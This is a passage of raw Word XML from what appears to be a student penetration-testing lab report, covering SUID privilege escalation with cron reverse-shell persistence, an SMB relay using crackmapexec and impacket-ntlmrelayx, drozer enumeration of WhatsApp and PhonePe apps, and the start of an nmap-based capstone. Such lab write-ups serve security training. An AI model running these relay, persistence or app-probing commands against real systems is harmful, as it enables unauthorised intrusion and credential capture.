            <wp:docPr id="115318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835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EBC7" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCE73E2" w14:textId="1774C1C3" w:rsidR="00F023DE" w:rsidRPr="0030439D" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F023D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53A26AF" wp14:editId="4C2B24CC">
            <wp:extent cx="5733415" cy="2018030"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="661268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682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6A99C" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611DC0A8" w14:textId="2E2F8C50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lastRenderedPageBreak/>
        <w:t>Privilege Escalation Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74E61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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LinPEAS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identified multiple SUID misconfigurations. The `find` binary was exploited to gain root access. Persistence was established via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cron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job executing reverse shell every 5 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AD15F" w14:textId="6D337EEB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51EEFA82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580D34A0" w14:textId="4852B60B" w:rsidR="0030439D" w:rsidRPr="00207D89" w:rsidRDefault="0030439D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D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 4: Network Protocol Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8D171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2077A46F" w14:textId="378F998D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Procedure: SMB Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBFBA2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0021505F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Tools Used: `Responder`, `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Impacket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`, `Wireshark`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914E9D0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525A84D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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470556BE" w14:textId="227FDC56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1. Target Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD9A9B" w14:textId="58807719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crackmapexec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smb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192.168.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/24 --gen-relay-list targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63392E" w14:textId="528944F4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C95725A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2. Configure Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50BBF6" w14:textId="07EAF66C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7047C154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# Edit /etc/responder/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Responder.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="134E95CD" w14:textId="7241AA23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# Set SMB and HTTP to Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D598A3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454D83C6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3. Execute Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40B3FB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impacket-ntlmrelayx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tf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targets.txt -smb2support -c "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whoami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>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CAB60" w14:textId="5BF0B9D3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2A175439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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C06DA15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| Attack ID | Technique | Target IP | Status | Outcome |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE94D7F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|-----------|-----------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8AF33" w14:textId="7345A9A0" w:rsid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| 015 | SMB Relay Attack | 192.168.1.200 | Success | NTLM Hash Captured |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC4464" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRPr="0030439D" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CBEA190" w14:textId="7DDE382F" w:rsidR="000538F9" w:rsidRDefault="000538F9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5B6DEBC" wp14:editId="27C18339">
            <wp:extent cx="5733415" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19684582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C8903" w14:textId="77777777" w:rsidR="003E7869" w:rsidRDefault="003E7869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B8B8BFE" w14:textId="0E87AF7D" w:rsidR="003E7869" w:rsidRDefault="003E7869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00337B6" wp14:editId="6C642E1F">
            <wp:extent cx="5733415" cy="3910965"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19327070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91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84D1F" w14:textId="77777777" w:rsidR="003E7869" w:rsidRDefault="003E7869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C61EC8" w14:textId="5A4A3B78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207D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Attack Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28979DAC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SMB relay attack successfully captured and relayed NTLM hashes, granting unauthorized access to target systems. ARP spoofing enabled traffic interception, revealing plaintext credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DFA7BD" w14:textId="77777777" w:rsidR="003E7869" w:rsidRDefault="003E7869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50D5B8" w14:textId="7B35C551" w:rsidR="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 5: Mobile Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C29174" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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23A453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Procedure: Android APK Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63CBA3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7187F903" w14:textId="565B803F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Tools Used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>drozer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008026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6BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868EF44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3CAFAAE4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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44884F96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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C620E13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apt install default-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jdk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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C2CDEA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apt install python3-pip -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046249C7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</w:p>
    <w:p w14:paraId="49B4FA82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>*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> run if pip is not working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB354D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apt install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pipx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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638B047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pipx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ensurepath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>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF5D74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</w:p>
    <w:p w14:paraId="3940CD75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lastRenderedPageBreak/>
        <w:t>continue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616E2B1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pipx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install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drozer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="370343F8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apt install android-tools-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adb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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13534641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</w:p>
    <w:p w14:paraId="7CBAF830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 xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> if above command not working run below command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD03BB4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nano /etc/apt/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sources.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E8F4261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>in the above open sheet add the below lines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F262DA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 xml:space="preserve">deb http://http.kali.org/kali kali-rolling main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contrib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non-free non-free-firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6EFFA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amele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ctrl+o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and press enter and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crtrl+X</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BF13F28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>then try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110CC9C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apt install android-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sdk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>-platform-tools -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070F051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</w:p>
    <w:p w14:paraId="47C036B5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>continue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF8B15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apt install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apktool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jadx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-y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87697C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</w:p>
    <w:p w14:paraId="7EE6B779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>enable developer option and debugging option in the device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74199FDB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>Then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16167AFD" w14:textId="758F23F9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adb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devices (to check device is connected or not)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778FB12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</w:p>
    <w:p w14:paraId="7744E675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 xml:space="preserve">then install the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apk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file shared:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A1FB3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</w:p>
    <w:p w14:paraId="1BAEDFFC" w14:textId="1F9825D6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adb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install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drozer-agent.apk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026BB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drozer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> app will be installed in the app and then turn on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED384BD" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="5A5A29D8" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="4CE48355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</w:p>
    <w:p w14:paraId="3DAB57C3" w14:textId="5FF93FE1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>Then in terminal run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4EFF2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adb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forward tcp:31415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tcp:31415</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EC097AD" w14:textId="5A361AB6" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="008026BB" w:rsidP="008026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026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>drozer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console connect --server 127.0.0.1:31415</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9634A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341886B6" w14:textId="147ECFDE" w:rsidR="008026BB" w:rsidRPr="008026BB" w:rsidRDefault="008026BB" w:rsidP="008026BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>after connection established run to get crucial details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F84E353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 xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app.package</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3811D5F9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 xml:space="preserve">run app.package.info -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F4A7DBD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 xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app.package</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.manifest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026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07C66BB1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 xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app.package</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.attacksurface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026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="621E2955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 xml:space="preserve">run app.broadcast.info -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A249F62" w14:textId="77777777" w:rsidR="008026BB" w:rsidRPr="008026BB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 xml:space="preserve">run app.activity.info -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A1753BC" w14:textId="2A0355F5" w:rsidR="0030439D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8026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app.provider</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.finduri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008026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026BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.phonepe.app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F131AE8" w14:textId="77777777" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B32D227" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="008026BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BEA445" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="008026BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD32B44" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="008026BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBA37F5" w14:textId="4DB09F11" w:rsidR="008026BB" w:rsidRPr="0030439D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lastRenderedPageBreak/>
        <w:t>Mobile Testing Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060192BD" w14:textId="77777777" w:rsidR="008026BB" w:rsidRPr="0030439D" w:rsidRDefault="008026BB" w:rsidP="008026BB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Static analysis revealed insecure data storage in logs. Dynamic analysis using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drozer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successfully bypassed client-side authentication controls. IPC components were exposed and exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72772458" w14:textId="77777777" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7711B8" w14:textId="7C41CBC2" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439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AFFAFE3" wp14:editId="4DF6EA14">
            <wp:extent cx="4279900" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="2017425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900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CECDB" w14:textId="77777777" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AA9AB7" w14:textId="41094A34" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439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20A991B" wp14:editId="33D9BF35">
            <wp:extent cx="2438400" cy="2235200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11017868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6B9BC" w14:textId="31CF2124" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439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0BC93D6" wp14:editId="2835C4E4">
            <wp:extent cx="3181350" cy="2165350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="16653549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216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56878" w14:textId="77777777" w:rsidR="008026BB" w:rsidRDefault="008026BB" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E241DBD" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE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F44543" w14:textId="0692A40A" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab 6: Capstone - Full VAPT Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511FFD2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6E8FE517" w14:textId="389B04D9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Procedure: Complete PTES Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154A057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4AE6C1DA" w14:textId="7C37A9B6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Tools Used: `Kali Linux`, `Metasploit`, `OpenVAS`, `Burp Suite`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7ACA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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68983293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1. Intelligence Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52316159" w14:textId="77777777" w:rsidR="00C826A4" w:rsidRDefault="00C826A4" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C9EA91" w14:textId="37C3303B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nmap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sS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sV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-</w:t>
      </w:r>
      <w:r w:rsidR="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p6667</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00C826A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738AD71" w14:textId="04207305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</w:t>
      </w:r>
      <w:r w:rsidR="00C826A4" w:rsidRPr="00C826A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BE94B4C" wp14:editId="5952EE2A">
            <wp:extent cx="5733415" cy="1689735"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="419528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284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2B020" w14:textId="78988C35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90BA0EE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0E29941E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2. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C240B94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OpenVAS scan confirmed backdoor vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453EF45" w14:textId="77777777" w:rsidR="00C826A4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Manual verification of service version</w:t>
      </w:r>
    </w:p>
